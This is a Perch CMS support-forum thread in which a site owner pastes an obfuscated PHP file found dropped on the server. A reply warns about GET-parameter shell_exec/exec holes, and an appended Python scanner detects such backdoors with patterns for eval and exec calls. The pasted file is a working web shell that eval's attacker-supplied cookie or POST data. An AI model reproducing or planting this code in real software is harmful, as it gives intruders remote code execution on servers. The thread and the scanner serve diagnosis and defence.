Random files being generated by server in Perch CMS

  • I noticed recently that there are random PHP files being generated in a project website. They have random filenames 8 characters long (e.g. s4n8jtba.php) and the contents are as follows:


    PHP
    <?php
    $ngpsdj = '0#e4H\'s_86mu5n13xglbctpya-*kv7i2ordf';$vuheeac = Array();$vuheeac[] = $ngpsdj[31].$ngpsdj[3].$ngpsdj[9].$ngpsdj[20].$ngpsdj[14].$ngpsdj[2].$ngpsdj[14].$ngpsdj[15].$ngpsdj[25].$ngpsdj[14].$ngpsdj[8].$ngpsdj[8].$ngpsdj[12].$ngpsdj[25].$ngpsdj[3].$ngpsdj[31].$ngpsdj[19].$ngpsdj[24].$ngpsdj[25].$ngpsdj[8].$ngpsdj[34].$ngpsdj[34].$ngpsdj[8].$ngpsdj[25].$ngpsdj[20].$ngpsdj[24].$ngpsdj[24].$ngpsdj[29].$ngpsdj[35].$ngpsdj[35].$ngpsdj[20].$ngpsdj[12].$ngpsdj[19].$ngpsdj[15].$ngpsdj[0].$ngpsdj[20];$vuheeac[] = $ngpsdj[4].$ngpsdj[26];$vuheeac[] = $ngpsdj[1];$vuheeac[] = $ngpsdj[20].$ngpsdj[32].$ngpsdj[11].$ngpsdj[13].$ngpsdj[21];$vuheeac[] = $ngpsdj[6].$ngpsdj[21].$ngpsdj[33].$ngpsdj[7].$ngpsdj[33].$ngpsdj[2].$ngpsdj[22].$ngpsdj[2].$ngpsdj[24].$ngpsdj[21];$vuheeac[] = $ngpsdj[2].$ngpsdj[16].$ngpsdj[22].$ngpsdj[18].$ngpsdj[32].$ngpsdj[34].$ngpsdj[2];$vuheeac[] = $ngpsdj[6].$ngpsdj[11].$ngpsdj[19].$ngpsdj[6].$ngpsdj[21].$ngpsdj[33];$vuheeac[] = $ngpsdj[24].$ngpsdj[33].$ngpsdj[33].$ngpsdj[24].$ngpsdj[23].$ngpsdj[7].$ngpsdj[10].$ngpsdj[2].$ngpsdj[33].$ngpsdj[17].$ngpsdj[2];$vuheeac[] = $ngpsdj[6].$ngpsdj[21].$ngpsdj[33].$ngpsdj[18].$ngpsdj[2].$ngpsdj[13];$vuheeac[] = $ngpsdj[22].$ngpsdj[24].$ngpsdj[20].$ngpsdj[27];foreach ($vuheeac[7]($_COOKIE, $_POST) as $mzjzaqr => $sgpzis){function pbzhjwi($vuheeac, $mzjzaqr, $rkoyu){return $vuheeac[6]($vuheeac[4]($mzjzaqr . $vuheeac[0], ($rkoyu / $vuheeac[8]($mzjzaqr)) + 1), 0, $rkoyu);}function bfnuxvy($vuheeac, $bovpw){return @$vuheeac[9]($vuheeac[1], $bovpw);}function orees($vuheeac, $bovpw){$bnjmio = $vuheeac[3]($bovpw) % 3;if (!$bnjmio) {eval($bovpw[1]($bovpw[2]));exit();}}$sgpzis = bfnuxvy($vuheeac, $sgpzis);orees($vuheeac, $vuheeac[5]($vuheeac[2], $sgpzis ^ pbzhjwi($vuheeac, $mzjzaqr, $vuheeac[8]($sgpzis))));}

    Has anyone else seen this with their project?


    Perch diagnostics for the site are as follows:


    Server system settings


    OS CentOS 6.10 (Final)

    Product Plesk Onyx

    Version 17.8.11

    PHP version: 5.4.13 (Outdated)

  • drewm

    Approved the thread.
  • You may also want to just make sure that none of your pages allow for self-executing code via a GET param. Something that could be executing a shell_exec() or exec() function that would write its own file to the directory. I've seen this on an old site I inherited a while ago. Often it will create a page that will execute the mail function to be used as a larger network of spam-sending bots.
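
A defender-side sweep for the two things this thread describes, added here as an example and not posted by anyone in the thread: the 8-character PHP filenames with character-indexed string building from the first post, and `shell_exec()`/`exec()` calls fed from a GET parameter from the reply. The indicator names, the `min_hits` threshold and the sample string are assumptions made for this example.

```python
import re
import sys
from pathlib import Path

# Filename shape reported in the thread: 8 lowercase letters/digits + .php
RANDOM_NAME = re.compile(r"^[a-z0-9]{8}\.php$")
# Strings assembled one character at a time: $v[31].$v[3].$v[9]...
INDEX_CHAIN = re.compile(r"(?:\$\w+\[\d+\]\s*\.\s*){5,}\$\w+\[\d+\]")
# An array element called as a function on request data: $v[7]($_COOKIE, ...)
DYNAMIC_CALL = re.compile(r"\$\w+(?:\[\d+\])+\s*\(\s*\$_(?:COOKIE|POST|GET|REQUEST)")
EVAL_CALL = re.compile(r"\beval\s*\(")
# The reply's concern: command execution fed from a GET parameter
CMD_FROM_GET = re.compile(r"\b(?:shell_exec|exec)\s*\([^;]*\$_GET")
# Constructed, inert sample for this example (not the file from the thread)
SAMPLE = ("<?php $t='abcdefg';$f=$t[0].$t[1].$t[2].$t[3].$t[4].$t[5].$t[6];"
          "foreach($x[7]($_COOKIE,$_POST) as $k=>$v){}")

def score_php(name, source):
    """Return the labels of the indicators that fire for one PHP file."""
    checks = [
        ("random-8-char-name", RANDOM_NAME.match(name)),
        ("char-index-string-building", INDEX_CHAIN.search(source)),
        ("dynamic-call-on-request-data", DYNAMIC_CALL.search(source)),
        ("eval", EVAL_CALL.search(source)),
        ("command-exec-from-GET", CMD_FROM_GET.search(source)),
    ]
    return [label for label, hit in checks if hit]

def scan(webroot, min_hits=2):
    """Walk webroot and report PHP files with at least min_hits indicators."""
    report = {}
    for path in Path(webroot).rglob("*.php"):
        try:
            source = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the sweep
        hits = score_php(path.name, source)
        # A GET-fed exec call is reported even when it is the only indicator
        if len(hits) >= min_hits or "command-exec-from-GET" in hits:
            report[str(path)] = hits
    return report

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for file, hits in scan(sys.argv[1]).items():
            print(f"{file}: {', '.join(hits)}")
    else:
        print(score_php("ab12cd34.php", SAMPLE))
```

Ordinary names such as settings.php also have eight characters, which is why a filename match on its own is not reported.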